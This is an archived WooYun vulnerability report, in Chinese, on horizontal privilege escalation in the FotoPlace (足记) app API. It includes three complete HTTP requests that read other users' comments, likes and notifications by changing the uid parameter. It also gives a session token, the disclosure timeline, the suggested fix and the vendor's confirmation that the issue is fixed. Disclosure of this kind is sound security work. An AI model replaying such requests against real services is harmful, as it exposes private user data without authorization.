当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120480

漏洞标题:足迹APP多处平行权限漏洞

相关厂商:足记APP

漏洞作者: 幻老头儿

提交时间:2015-06-14 19:49

修复时间:2015-07-29 23:46

公开时间:2015-07-29 23:46

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-14: 细节已通知厂商并且等待厂商处理中
2015-06-14: 厂商已经确认,细节仅向厂商公开
2015-06-24: 细节向核心白帽子及相关领域专家公开
2015-07-04: 细节向普通白帽子公开
2015-07-14: 细节向实习白帽子公开
2015-07-29: 细节向公众公开

简要描述:

rt

详细说明:

在用户消息处,多处存在修改uid就可以平行权限漏洞,可任意查看他人敏感操作信息

漏洞证明:

1.png


以id为1的足记官方账号为例
评论

POST /api2/user/user_get_comment.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 97
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)
offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=1&version=2.6


赞的

2.png


POST /api2/user/user_get_like_list.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 103
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)
offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6


4.png


通知

POST /api2/user/user_get_notice_list.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 106
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)
pageindex=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6


3.png

修复方案:

所有操作先做sign身份标记验证

版权声明:转载请注明来源 幻老头儿@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-14 23:46

厂商回复:

正在处理中,感谢提供漏洞信息

最新状态:

2015-06-16:已经修复